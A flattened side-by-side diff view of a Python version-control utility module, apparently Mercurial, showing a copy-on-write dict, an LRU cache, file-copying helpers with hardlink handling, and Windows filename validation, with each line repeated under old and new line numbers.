1160 >>> a = a.preparewrite()
1163 >>> b is a
1161 >>> b is a
1164 False
1162 False
1165 >>> a is a.preparewrite()
1163 >>> a is a.preparewrite()
1166 True
1164 True
1167 >>> c = c.preparewrite()
1165 >>> c = c.preparewrite()
1168 >>> b is c
1166 >>> b is c
1169 False
1167 False
1170 >>> b is b.preparewrite()
1168 >>> b is b.preparewrite()
1171 True
1169 True
1172 """
1170 """
1173
1171
1174 class cowsortdict(cow, sortdict):
1172 class cowsortdict(cow, sortdict):
1175 """copy-on-write sortdict
1173 """copy-on-write sortdict
1176
1174
1177 Be sure to call d = d.preparewrite() before writing to d.
1175 Be sure to call d = d.preparewrite() before writing to d.
1178 """
1176 """
1179
1177
1180 class transactional(object):
1178 class transactional(object):
1181 """Base class for making a transactional type into a context manager."""
1179 """Base class for making a transactional type into a context manager."""
1182 __metaclass__ = abc.ABCMeta
1180 __metaclass__ = abc.ABCMeta
1183
1181
1184 @abc.abstractmethod
1182 @abc.abstractmethod
1185 def close(self):
1183 def close(self):
1186 """Successfully closes the transaction."""
1184 """Successfully closes the transaction."""
1187
1185
1188 @abc.abstractmethod
1186 @abc.abstractmethod
1189 def release(self):
1187 def release(self):
1190 """Marks the end of the transaction.
1188 """Marks the end of the transaction.
1191
1189
1192 If the transaction has not been closed, it will be aborted.
1190 If the transaction has not been closed, it will be aborted.
1193 """
1191 """
1194
1192
1195 def __enter__(self):
1193 def __enter__(self):
1196 return self
1194 return self
1197
1195
1198 def __exit__(self, exc_type, exc_val, exc_tb):
1196 def __exit__(self, exc_type, exc_val, exc_tb):
1199 try:
1197 try:
1200 if exc_type is None:
1198 if exc_type is None:
1201 self.close()
1199 self.close()
1202 finally:
1200 finally:
1203 self.release()
1201 self.release()
1204
1202
1205 @contextlib.contextmanager
1203 @contextlib.contextmanager
1206 def acceptintervention(tr=None):
1204 def acceptintervention(tr=None):
1207 """A context manager that closes the transaction on InterventionRequired
1205 """A context manager that closes the transaction on InterventionRequired
1208
1206
1209 If no transaction was provided, this simply runs the body and returns
1207 If no transaction was provided, this simply runs the body and returns
1210 """
1208 """
1211 if not tr:
1209 if not tr:
1212 yield
1210 yield
1213 return
1211 return
1214 try:
1212 try:
1215 yield
1213 yield
1216 tr.close()
1214 tr.close()
1217 except error.InterventionRequired:
1215 except error.InterventionRequired:
1218 tr.close()
1216 tr.close()
1219 raise
1217 raise
1220 finally:
1218 finally:
1221 tr.release()
1219 tr.release()
1222
1220
1223 @contextlib.contextmanager
1221 @contextlib.contextmanager
1224 def nullcontextmanager():
1222 def nullcontextmanager():
1225 yield
1223 yield
1226
1224
1227 class _lrucachenode(object):
1225 class _lrucachenode(object):
1228 """A node in a doubly linked list.
1226 """A node in a doubly linked list.
1229
1227
1230 Holds a reference to nodes on either side as well as a key-value
1228 Holds a reference to nodes on either side as well as a key-value
1231 pair for the dictionary entry.
1229 pair for the dictionary entry.
1232 """
1230 """
1233 __slots__ = (u'next', u'prev', u'key', u'value')
1231 __slots__ = (u'next', u'prev', u'key', u'value')
1234
1232
1235 def __init__(self):
1233 def __init__(self):
1236 self.next = None
1234 self.next = None
1237 self.prev = None
1235 self.prev = None
1238
1236
1239 self.key = _notset
1237 self.key = _notset
1240 self.value = None
1238 self.value = None
1241
1239
1242 def markempty(self):
1240 def markempty(self):
1243 """Mark the node as emptied."""
1241 """Mark the node as emptied."""
1244 self.key = _notset
1242 self.key = _notset
1245
1243
1246 class lrucachedict(object):
1244 class lrucachedict(object):
1247 """Dict that caches most recent accesses and sets.
1245 """Dict that caches most recent accesses and sets.
1248
1246
1249 The dict consists of an actual backing dict - indexed by original
1247 The dict consists of an actual backing dict - indexed by original
1250 key - and a doubly linked circular list defining the order of entries in
1248 key - and a doubly linked circular list defining the order of entries in
1251 the cache.
1249 the cache.
1252
1250
1253 The head node is the newest entry in the cache. If the cache is full,
1251 The head node is the newest entry in the cache. If the cache is full,
1254 we recycle head.prev and make it the new head. Cache accesses result in
1252 we recycle head.prev and make it the new head. Cache accesses result in
1255 the node being moved to before the existing head and being marked as the
1253 the node being moved to before the existing head and being marked as the
1256 new head node.
1254 new head node.
1257 """
1255 """
1258 def __init__(self, max):
1256 def __init__(self, max):
1259 self._cache = {}
1257 self._cache = {}
1260
1258
1261 self._head = head = _lrucachenode()
1259 self._head = head = _lrucachenode()
1262 head.prev = head
1260 head.prev = head
1263 head.next = head
1261 head.next = head
1264 self._size = 1
1262 self._size = 1
1265 self._capacity = max
1263 self._capacity = max
1266
1264
1267 def __len__(self):
1265 def __len__(self):
1268 return len(self._cache)
1266 return len(self._cache)
1269
1267
1270 def __contains__(self, k):
1268 def __contains__(self, k):
1271 return k in self._cache
1269 return k in self._cache
1272
1270
1273 def __iter__(self):
1271 def __iter__(self):
1274 # We don't have to iterate in cache order, but why not.
1272 # We don't have to iterate in cache order, but why not.
1275 n = self._head
1273 n = self._head
1276 for i in range(len(self._cache)):
1274 for i in range(len(self._cache)):
1277 yield n.key
1275 yield n.key
1278 n = n.next
1276 n = n.next
1279
1277
1280 def __getitem__(self, k):
1278 def __getitem__(self, k):
1281 node = self._cache[k]
1279 node = self._cache[k]
1282 self._movetohead(node)
1280 self._movetohead(node)
1283 return node.value
1281 return node.value
1284
1282
1285 def __setitem__(self, k, v):
1283 def __setitem__(self, k, v):
1286 node = self._cache.get(k)
1284 node = self._cache.get(k)
1287 # Replace existing value and mark as newest.
1285 # Replace existing value and mark as newest.
1288 if node is not None:
1286 if node is not None:
1289 node.value = v
1287 node.value = v
1290 self._movetohead(node)
1288 self._movetohead(node)
1291 return
1289 return
1292
1290
1293 if self._size < self._capacity:
1291 if self._size < self._capacity:
1294 node = self._addcapacity()
1292 node = self._addcapacity()
1295 else:
1293 else:
1296 # Grab the last/oldest item.
1294 # Grab the last/oldest item.
1297 node = self._head.prev
1295 node = self._head.prev
1298
1296
1299 # At capacity. Kill the old entry.
1297 # At capacity. Kill the old entry.
1300 if node.key is not _notset:
1298 if node.key is not _notset:
1301 del self._cache[node.key]
1299 del self._cache[node.key]
1302
1300
1303 node.key = k
1301 node.key = k
1304 node.value = v
1302 node.value = v
1305 self._cache[k] = node
1303 self._cache[k] = node
1306 # And mark it as newest entry. No need to adjust order since it
1304 # And mark it as newest entry. No need to adjust order since it
1307 # is already self._head.prev.
1305 # is already self._head.prev.
1308 self._head = node
1306 self._head = node
1309
1307
1310 def __delitem__(self, k):
1308 def __delitem__(self, k):
1311 node = self._cache.pop(k)
1309 node = self._cache.pop(k)
1312 node.markempty()
1310 node.markempty()
1313
1311
1314 # Temporarily mark as newest item before re-adjusting head to make
1312 # Temporarily mark as newest item before re-adjusting head to make
1315 # this node the oldest item.
1313 # this node the oldest item.
1316 self._movetohead(node)
1314 self._movetohead(node)
1317 self._head = node.next
1315 self._head = node.next
1318
1316
1319 # Additional dict methods.
1317 # Additional dict methods.
1320
1318
1321 def get(self, k, default=None):
1319 def get(self, k, default=None):
1322 try:
1320 try:
1323 return self._cache[k].value
1321 return self._cache[k].value
1324 except KeyError:
1322 except KeyError:
1325 return default
1323 return default
1326
1324
1327 def clear(self):
1325 def clear(self):
1328 n = self._head
1326 n = self._head
1329 while n.key is not _notset:
1327 while n.key is not _notset:
1330 n.markempty()
1328 n.markempty()
1331 n = n.next
1329 n = n.next
1332
1330
1333 self._cache.clear()
1331 self._cache.clear()
1334
1332
1335 def copy(self):
1333 def copy(self):
1336 result = lrucachedict(self._capacity)
1334 result = lrucachedict(self._capacity)
1337 n = self._head.prev
1335 n = self._head.prev
1338 # Iterate in oldest-to-newest order, so the copy has the right ordering
1336 # Iterate in oldest-to-newest order, so the copy has the right ordering
1339 for i in range(len(self._cache)):
1337 for i in range(len(self._cache)):
1340 result[n.key] = n.value
1338 result[n.key] = n.value
1341 n = n.prev
1339 n = n.prev
1342 return result
1340 return result
1343
1341
1344 def _movetohead(self, node):
1342 def _movetohead(self, node):
1345 """Mark a node as the newest, making it the new head.
1343 """Mark a node as the newest, making it the new head.
1346
1344
1347 When a node is accessed, it becomes the freshest entry in the LRU
1345 When a node is accessed, it becomes the freshest entry in the LRU
1348 list, which is denoted by self._head.
1346 list, which is denoted by self._head.
1349
1347
1350 Visually, let's make ``N`` the new head node (* denotes head):
1348 Visually, let's make ``N`` the new head node (* denotes head):
1351
1349
1352 previous/oldest <-> head <-> next/next newest
1350 previous/oldest <-> head <-> next/next newest
1353
1351
1354 ----<->--- A* ---<->-----
1352 ----<->--- A* ---<->-----
1355 | |
1353 | |
1356 E <-> D <-> N <-> C <-> B
1354 E <-> D <-> N <-> C <-> B
1357
1355
1358 To:
1356 To:
1359
1357
1360 ----<->--- N* ---<->-----
1358 ----<->--- N* ---<->-----
1361 | |
1359 | |
1362 E <-> D <-> C <-> B <-> A
1360 E <-> D <-> C <-> B <-> A
1363
1361
1364 This requires the following moves:
1362 This requires the following moves:
1365
1363
1366 C.next = D (node.prev.next = node.next)
1364 C.next = D (node.prev.next = node.next)
1367 D.prev = C (node.next.prev = node.prev)
1365 D.prev = C (node.next.prev = node.prev)
1368 E.next = N (head.prev.next = node)
1366 E.next = N (head.prev.next = node)
1369 N.prev = E (node.prev = head.prev)
1367 N.prev = E (node.prev = head.prev)
1370 N.next = A (node.next = head)
1368 N.next = A (node.next = head)
1371 A.prev = N (head.prev = node)
1369 A.prev = N (head.prev = node)
1372 """
1370 """
1373 head = self._head
1371 head = self._head
1374 # C.next = D
1372 # C.next = D
1375 node.prev.next = node.next
1373 node.prev.next = node.next
1376 # D.prev = C
1374 # D.prev = C
1377 node.next.prev = node.prev
1375 node.next.prev = node.prev
1378 # N.prev = E
1376 # N.prev = E
1379 node.prev = head.prev
1377 node.prev = head.prev
1380 # N.next = A
1378 # N.next = A
1381 # It is tempting to do just "head" here, however if node is
1379 # It is tempting to do just "head" here, however if node is
1382 # adjacent to head, this will do bad things.
1380 # adjacent to head, this will do bad things.
1383 node.next = head.prev.next
1381 node.next = head.prev.next
1384 # E.next = N
1382 # E.next = N
1385 node.next.prev = node
1383 node.next.prev = node
1386 # A.prev = N
1384 # A.prev = N
1387 node.prev.next = node
1385 node.prev.next = node
1388
1386
1389 self._head = node
1387 self._head = node
1390
1388
1391 def _addcapacity(self):
1389 def _addcapacity(self):
1392 """Add a node to the circular linked list.
1390 """Add a node to the circular linked list.
1393
1391
1394 The new node is inserted before the head node.
1392 The new node is inserted before the head node.
1395 """
1393 """
1396 head = self._head
1394 head = self._head
1397 node = _lrucachenode()
1395 node = _lrucachenode()
1398 head.prev.next = node
1396 head.prev.next = node
1399 node.prev = head.prev
1397 node.prev = head.prev
1400 node.next = head
1398 node.next = head
1401 head.prev = node
1399 head.prev = node
1402 self._size += 1
1400 self._size += 1
1403 return node
1401 return node
1404
1402
1405 def lrucachefunc(func):
1403 def lrucachefunc(func):
1406 '''cache most recent results of function calls'''
1404 '''cache most recent results of function calls'''
1407 cache = {}
1405 cache = {}
1408 order = collections.deque()
1406 order = collections.deque()
1409 if func.__code__.co_argcount == 1:
1407 if func.__code__.co_argcount == 1:
1410 def f(arg):
1408 def f(arg):
1411 if arg not in cache:
1409 if arg not in cache:
1412 if len(cache) > 20:
1410 if len(cache) > 20:
1413 del cache[order.popleft()]
1411 del cache[order.popleft()]
1414 cache[arg] = func(arg)
1412 cache[arg] = func(arg)
1415 else:
1413 else:
1416 order.remove(arg)
1414 order.remove(arg)
1417 order.append(arg)
1415 order.append(arg)
1418 return cache[arg]
1416 return cache[arg]
1419 else:
1417 else:
1420 def f(*args):
1418 def f(*args):
1421 if args not in cache:
1419 if args not in cache:
1422 if len(cache) > 20:
1420 if len(cache) > 20:
1423 del cache[order.popleft()]
1421 del cache[order.popleft()]
1424 cache[args] = func(*args)
1422 cache[args] = func(*args)
1425 else:
1423 else:
1426 order.remove(args)
1424 order.remove(args)
1427 order.append(args)
1425 order.append(args)
1428 return cache[args]
1426 return cache[args]
1429
1427
1430 return f
1428 return f
1431
1429
1432 class propertycache(object):
1430 class propertycache(object):
1433 def __init__(self, func):
1431 def __init__(self, func):
1434 self.func = func
1432 self.func = func
1435 self.name = func.__name__
1433 self.name = func.__name__
1436 def __get__(self, obj, type=None):
1434 def __get__(self, obj, type=None):
1437 result = self.func(obj)
1435 result = self.func(obj)
1438 self.cachevalue(obj, result)
1436 self.cachevalue(obj, result)
1439 return result
1437 return result
1440
1438
1441 def cachevalue(self, obj, value):
1439 def cachevalue(self, obj, value):
1442 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1440 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1443 obj.__dict__[self.name] = value
1441 obj.__dict__[self.name] = value
1444
1442
1445 def clearcachedproperty(obj, prop):
1443 def clearcachedproperty(obj, prop):
1446 '''clear a cached property value, if one has been set'''
1444 '''clear a cached property value, if one has been set'''
1447 if prop in obj.__dict__:
1445 if prop in obj.__dict__:
1448 del obj.__dict__[prop]
1446 del obj.__dict__[prop]
1449
1447
1450 def increasingchunks(source, min=1024, max=65536):
1448 def increasingchunks(source, min=1024, max=65536):
1451 '''return no less than min bytes per chunk while data remains,
1449 '''return no less than min bytes per chunk while data remains,
1452 doubling min after each chunk until it reaches max'''
1450 doubling min after each chunk until it reaches max'''
1453 def log2(x):
1451 def log2(x):
1454 if not x:
1452 if not x:
1455 return 0
1453 return 0
1456 i = 0
1454 i = 0
1457 while x:
1455 while x:
1458 x >>= 1
1456 x >>= 1
1459 i += 1
1457 i += 1
1460 return i - 1
1458 return i - 1
1461
1459
1462 buf = []
1460 buf = []
1463 blen = 0
1461 blen = 0
1464 for chunk in source:
1462 for chunk in source:
1465 buf.append(chunk)
1463 buf.append(chunk)
1466 blen += len(chunk)
1464 blen += len(chunk)
1467 if blen >= min:
1465 if blen >= min:
1468 if min < max:
1466 if min < max:
1469 min = min << 1
1467 min = min << 1
1470 nmin = 1 << log2(blen)
1468 nmin = 1 << log2(blen)
1471 if nmin > min:
1469 if nmin > min:
1472 min = nmin
1470 min = nmin
1473 if min > max:
1471 if min > max:
1474 min = max
1472 min = max
1475 yield ''.join(buf)
1473 yield ''.join(buf)
1476 blen = 0
1474 blen = 0
1477 buf = []
1475 buf = []
1478 if buf:
1476 if buf:
1479 yield ''.join(buf)
1477 yield ''.join(buf)
1480
1478
1481 def always(fn):
1479 def always(fn):
1482 return True
1480 return True
1483
1481
1484 def never(fn):
1482 def never(fn):
1485 return False
1483 return False
1486
1484
1487 def nogc(func):
1485 def nogc(func):
1488 """disable garbage collector
1486 """disable garbage collector
1489
1487
1490 Python's garbage collector triggers a GC each time a certain number of
1488 Python's garbage collector triggers a GC each time a certain number of
1491 container objects (the number being defined by gc.get_threshold()) are
1489 container objects (the number being defined by gc.get_threshold()) are
1492 allocated even when marked not to be tracked by the collector. Tracking has
1490 allocated even when marked not to be tracked by the collector. Tracking has
1493 no effect on when GCs are triggered, only on what objects the GC looks
1491 no effect on when GCs are triggered, only on what objects the GC looks
1494 into. As a workaround, disable GC while building complex (huge)
1492 into. As a workaround, disable GC while building complex (huge)
1495 containers.
1493 containers.
1496
1494
1497 This garbage collector issue have been fixed in 2.7. But it still affect
1495 This garbage collector issue have been fixed in 2.7. But it still affect
1498 CPython's performance.
1496 CPython's performance.
1499 """
1497 """
1500 def wrapper(*args, **kwargs):
1498 def wrapper(*args, **kwargs):
1501 gcenabled = gc.isenabled()
1499 gcenabled = gc.isenabled()
1502 gc.disable()
1500 gc.disable()
1503 try:
1501 try:
1504 return func(*args, **kwargs)
1502 return func(*args, **kwargs)
1505 finally:
1503 finally:
1506 if gcenabled:
1504 if gcenabled:
1507 gc.enable()
1505 gc.enable()
1508 return wrapper
1506 return wrapper
1509
1507
1510 if pycompat.ispypy:
1508 if pycompat.ispypy:
1511 # PyPy runs slower with gc disabled
1509 # PyPy runs slower with gc disabled
1512 nogc = lambda x: x
1510 nogc = lambda x: x
1513
1511
1514 def pathto(root, n1, n2):
1512 def pathto(root, n1, n2):
1515 '''return the relative path from one place to another.
1513 '''return the relative path from one place to another.
1516 root should use os.sep to separate directories
1514 root should use os.sep to separate directories
1517 n1 should use os.sep to separate directories
1515 n1 should use os.sep to separate directories
1518 n2 should use "/" to separate directories
1516 n2 should use "/" to separate directories
1519 returns an os.sep-separated path.
1517 returns an os.sep-separated path.
1520
1518
1521 If n1 is a relative path, it's assumed it's
1519 If n1 is a relative path, it's assumed it's
1522 relative to root.
1520 relative to root.
1523 n2 should always be relative to root.
1521 n2 should always be relative to root.
1524 '''
1522 '''
1525 if not n1:
1523 if not n1:
1526 return localpath(n2)
1524 return localpath(n2)
1527 if os.path.isabs(n1):
1525 if os.path.isabs(n1):
1528 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1526 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1529 return os.path.join(root, localpath(n2))
1527 return os.path.join(root, localpath(n2))
1530 n2 = '/'.join((pconvert(root), n2))
1528 n2 = '/'.join((pconvert(root), n2))
1531 a, b = splitpath(n1), n2.split('/')
1529 a, b = splitpath(n1), n2.split('/')
1532 a.reverse()
1530 a.reverse()
1533 b.reverse()
1531 b.reverse()
1534 while a and b and a[-1] == b[-1]:
1532 while a and b and a[-1] == b[-1]:
1535 a.pop()
1533 a.pop()
1536 b.pop()
1534 b.pop()
1537 b.reverse()
1535 b.reverse()
1538 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1536 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1539
1537
1540 # the location of data files matching the source code
1538 # the location of data files matching the source code
1541 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1539 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1542 # executable version (py2exe) doesn't support __file__
1540 # executable version (py2exe) doesn't support __file__
1543 datapath = os.path.dirname(pycompat.sysexecutable)
1541 datapath = os.path.dirname(pycompat.sysexecutable)
1544 else:
1542 else:
1545 datapath = os.path.dirname(pycompat.fsencode(__file__))
1543 datapath = os.path.dirname(pycompat.fsencode(__file__))
1546
1544
1547 i18n.setdatapath(datapath)
1545 i18n.setdatapath(datapath)
1548
1546
1549 def checksignature(func):
1547 def checksignature(func):
1550 '''wrap a function with code to check for calling errors'''
1548 '''wrap a function with code to check for calling errors'''
1551 def check(*args, **kwargs):
1549 def check(*args, **kwargs):
1552 try:
1550 try:
1553 return func(*args, **kwargs)
1551 return func(*args, **kwargs)
1554 except TypeError:
1552 except TypeError:
1555 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1553 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1556 raise error.SignatureError
1554 raise error.SignatureError
1557 raise
1555 raise
1558
1556
1559 return check
1557 return check
1560
1558
1561 # a whilelist of known filesystems where hardlink works reliably
1559 # a whilelist of known filesystems where hardlink works reliably
1562 _hardlinkfswhitelist = {
1560 _hardlinkfswhitelist = {
1563 'apfs',
1561 'apfs',
1564 'btrfs',
1562 'btrfs',
1565 'ext2',
1563 'ext2',
1566 'ext3',
1564 'ext3',
1567 'ext4',
1565 'ext4',
1568 'hfs',
1566 'hfs',
1569 'jfs',
1567 'jfs',
1570 'NTFS',
1568 'NTFS',
1571 'reiserfs',
1569 'reiserfs',
1572 'tmpfs',
1570 'tmpfs',
1573 'ufs',
1571 'ufs',
1574 'xfs',
1572 'xfs',
1575 'zfs',
1573 'zfs',
1576 }
1574 }
1577
1575
1578 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1576 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1579 '''copy a file, preserving mode and optionally other stat info like
1577 '''copy a file, preserving mode and optionally other stat info like
1580 atime/mtime
1578 atime/mtime
1581
1579
1582 checkambig argument is used with filestat, and is useful only if
1580 checkambig argument is used with filestat, and is useful only if
1583 destination file is guarded by any lock (e.g. repo.lock or
1581 destination file is guarded by any lock (e.g. repo.lock or
1584 repo.wlock).
1582 repo.wlock).
1585
1583
1586 copystat and checkambig should be exclusive.
1584 copystat and checkambig should be exclusive.
1587 '''
1585 '''
1588 assert not (copystat and checkambig)
1586 assert not (copystat and checkambig)
1589 oldstat = None
1587 oldstat = None
1590 if os.path.lexists(dest):
1588 if os.path.lexists(dest):
1591 if checkambig:
1589 if checkambig:
1592 oldstat = checkambig and filestat.frompath(dest)
1590 oldstat = checkambig and filestat.frompath(dest)
1593 unlink(dest)
1591 unlink(dest)
1594 if hardlink:
1592 if hardlink:
1595 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1593 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1596 # unless we are confident that dest is on a whitelisted filesystem.
1594 # unless we are confident that dest is on a whitelisted filesystem.
1597 try:
1595 try:
1598 fstype = getfstype(os.path.dirname(dest))
1596 fstype = getfstype(os.path.dirname(dest))
1599 except OSError:
1597 except OSError:
1600 fstype = None
1598 fstype = None
1601 if fstype not in _hardlinkfswhitelist:
1599 if fstype not in _hardlinkfswhitelist:
1602 hardlink = False
1600 hardlink = False
1603 if hardlink:
1601 if hardlink:
1604 try:
1602 try:
1605 oslink(src, dest)
1603 oslink(src, dest)
1606 return
1604 return
1607 except (IOError, OSError):
1605 except (IOError, OSError):
1608 pass # fall back to normal copy
1606 pass # fall back to normal copy
1609 if os.path.islink(src):
1607 if os.path.islink(src):
1610 os.symlink(os.readlink(src), dest)
1608 os.symlink(os.readlink(src), dest)
1611 # copytime is ignored for symlinks, but in general copytime isn't needed
1609 # copytime is ignored for symlinks, but in general copytime isn't needed
1612 # for them anyway
1610 # for them anyway
1613 else:
1611 else:
1614 try:
1612 try:
1615 shutil.copyfile(src, dest)
1613 shutil.copyfile(src, dest)
1616 if copystat:
1614 if copystat:
1617 # copystat also copies mode
1615 # copystat also copies mode
1618 shutil.copystat(src, dest)
1616 shutil.copystat(src, dest)
1619 else:
1617 else:
1620 shutil.copymode(src, dest)
1618 shutil.copymode(src, dest)
1621 if oldstat and oldstat.stat:
1619 if oldstat and oldstat.stat:
1622 newstat = filestat.frompath(dest)
1620 newstat = filestat.frompath(dest)
1623 if newstat.isambig(oldstat):
1621 if newstat.isambig(oldstat):
1624 # stat of copied file is ambiguous to original one
1622 # stat of copied file is ambiguous to original one
1625 advanced = (
1623 advanced = (
1626 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1624 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1627 os.utime(dest, (advanced, advanced))
1625 os.utime(dest, (advanced, advanced))
1628 except shutil.Error as inst:
1626 except shutil.Error as inst:
1629 raise error.Abort(str(inst))
1627 raise error.Abort(str(inst))
1630
1628
1631 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1629 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1632 """Copy a directory tree using hardlinks if possible."""
1630 """Copy a directory tree using hardlinks if possible."""
1633 num = 0
1631 num = 0
1634
1632
1635 gettopic = lambda: hardlink and _('linking') or _('copying')
1633 gettopic = lambda: hardlink and _('linking') or _('copying')
1636
1634
1637 if os.path.isdir(src):
1635 if os.path.isdir(src):
1638 if hardlink is None:
1636 if hardlink is None:
1639 hardlink = (os.stat(src).st_dev ==
1637 hardlink = (os.stat(src).st_dev ==
1640 os.stat(os.path.dirname(dst)).st_dev)
1638 os.stat(os.path.dirname(dst)).st_dev)
1641 topic = gettopic()
1639 topic = gettopic()
1642 os.mkdir(dst)
1640 os.mkdir(dst)
1643 for name, kind in listdir(src):
1641 for name, kind in listdir(src):
1644 srcname = os.path.join(src, name)
1642 srcname = os.path.join(src, name)
1645 dstname = os.path.join(dst, name)
1643 dstname = os.path.join(dst, name)
1646 def nprog(t, pos):
1644 def nprog(t, pos):
1647 if pos is not None:
1645 if pos is not None:
1648 return progress(t, pos + num)
1646 return progress(t, pos + num)
1649 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1647 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1650 num += n
1648 num += n
1651 else:
1649 else:
1652 if hardlink is None:
1650 if hardlink is None:
1653 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1651 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1654 os.stat(os.path.dirname(dst)).st_dev)
1652 os.stat(os.path.dirname(dst)).st_dev)
1655 topic = gettopic()
1653 topic = gettopic()
1656
1654
1657 if hardlink:
1655 if hardlink:
1658 try:
1656 try:
1659 oslink(src, dst)
1657 oslink(src, dst)
1660 except (IOError, OSError):
1658 except (IOError, OSError):
1661 hardlink = False
1659 hardlink = False
1662 shutil.copy(src, dst)
1660 shutil.copy(src, dst)
1663 else:
1661 else:
1664 shutil.copy(src, dst)
1662 shutil.copy(src, dst)
1665 num += 1
1663 num += 1
1666 progress(topic, num)
1664 progress(topic, num)
1667 progress(topic, None)
1665 progress(topic, None)
1668
1666
1669 return hardlink, num
1667 return hardlink, num
1670
1668
1671 _winreservednames = {
1669 _winreservednames = {
1672 'con', 'prn', 'aux', 'nul',
1670 'con', 'prn', 'aux', 'nul',
1673 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1671 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1674 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1672 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1675 }
1673 }
1676 _winreservedchars = ':*?"<>|'
1674 _winreservedchars = ':*?"<>|'
1677 def checkwinfilename(path):
1675 def checkwinfilename(path):
1678 r'''Check that the base-relative path is a valid filename on Windows.
1676 r'''Check that the base-relative path is a valid filename on Windows.
1679 Returns None if the path is ok, or a UI string describing the problem.
1677 Returns None if the path is ok, or a UI string describing the problem.
1680
1678
1681 >>> checkwinfilename(b"just/a/normal/path")
1679 >>> checkwinfilename(b"just/a/normal/path")
1682 >>> checkwinfilename(b"foo/bar/con.xml")
1680 >>> checkwinfilename(b"foo/bar/con.xml")
1683 "filename contains 'con', which is reserved on Windows"
1681 "filename contains 'con', which is reserved on Windows"
1684 >>> checkwinfilename(b"foo/con.xml/bar")
1682 >>> checkwinfilename(b"foo/con.xml/bar")
1685 "filename contains 'con', which is reserved on Windows"
1683 "filename contains 'con', which is reserved on Windows"
1686 >>> checkwinfilename(b"foo/bar/xml.con")
1684 >>> checkwinfilename(b"foo/bar/xml.con")
1687 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1685 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1688 "filename contains 'AUX', which is reserved on Windows"
1686 "filename contains 'AUX', which is reserved on Windows"
1689 >>> checkwinfilename(b"foo/bar/bla:.txt")
1687 >>> checkwinfilename(b"foo/bar/bla:.txt")
1690 "filename contains ':', which is reserved on Windows"
1688 "filename contains ':', which is reserved on Windows"
1691 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1689 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1692 "filename contains '\\x07', which is invalid on Windows"
1690 "filename contains '\\x07', which is invalid on Windows"
1693 >>> checkwinfilename(b"foo/bar/bla ")
1691 >>> checkwinfilename(b"foo/bar/bla ")
1694 "filename ends with ' ', which is not allowed on Windows"
1692 "filename ends with ' ', which is not allowed on Windows"
1695 >>> checkwinfilename(b"../bar")
1693 >>> checkwinfilename(b"../bar")
1696 >>> checkwinfilename(b"foo\\")
1694 >>> checkwinfilename(b"foo\\")
1697 "filename ends with '\\', which is invalid on Windows"
1695 "filename ends with '\\', which is invalid on Windows"
1698 >>> checkwinfilename(b"foo\\/bar")
1696 >>> checkwinfilename(b"foo\\/bar")
1699 "directory name ends with '\\', which is invalid on Windows"
1697 "directory name ends with '\\', which is invalid on Windows"
1700 '''
1698 '''
1701 if path.endswith('\\'):
1699 if path.endswith('\\'):
1702 return _("filename ends with '\\', which is invalid on Windows")
1700 return _("filename ends with '\\', which is invalid on Windows")
1703 if '\\/' in path:
1701 if '\\/' in path:
1704 return _("directory name ends with '\\', which is invalid on Windows")
1702 return _("directory name ends with '\\', which is invalid on Windows")
1705 for n in path.replace('\\', '/').split('/'):
1703 for n in path.replace('\\', '/').split('/'):
1706 if not n:
1704 if not n:
1707 continue
1705 continue
1708 for c in _filenamebytestr(n):
1706 for c in _filenamebytestr(n):
1709 if c in _winreservedchars:
1707 if c in _winreservedchars:
1710 return _("filename contains '%s', which is reserved "
1708 return _("filename contains '%s', which is reserved "
1711 "on Windows") % c
1709 "on Windows") % c
1712 if ord(c) <= 31:
1710 if ord(c) <= 31:
1713 return _("filename contains '%s', which is invalid "
1711 return _("filename contains '%s', which is invalid "
1714 "on Windows") % stringutil.escapestr(c)
1712 "on Windows") % stringutil.escapestr(c)
1715 base = n.split('.')[0]
1713 base = n.split('.')[0]
1716 if base and base.lower() in _winreservednames:
1714 if base and base.lower() in _winreservednames:
1717 return _("filename contains '%s', which is reserved "
1715 return _("filename contains '%s', which is reserved "
1718 "on Windows") % base
1716 "on Windows") % base
1719 t = n[-1:]
1717 t = n[-1:]
1720 if t in '. ' and n not in '..':
1718 if t in '. ' and n not in '..':
1721 return _("filename ends with '%s', which is not allowed "
1719 return _("filename ends with '%s', which is not allowed "
1722 "on Windows") % t
1720 "on Windows") % t
1723
1721
1724 if pycompat.iswindows:
1722 if pycompat.iswindows:
1725 checkosfilename = checkwinfilename
1723 checkosfilename = checkwinfilename
1726 timer = time.clock
1724 timer = time.clock
1727 else:
1725 else:
1728 checkosfilename = platform.checkosfilename
1726 checkosfilename = platform.checkosfilename
1729 timer = time.time
1727 timer = time.time
1730
1728
1731 if safehasattr(time, "perf_counter"):
1729 if safehasattr(time, "perf_counter"):
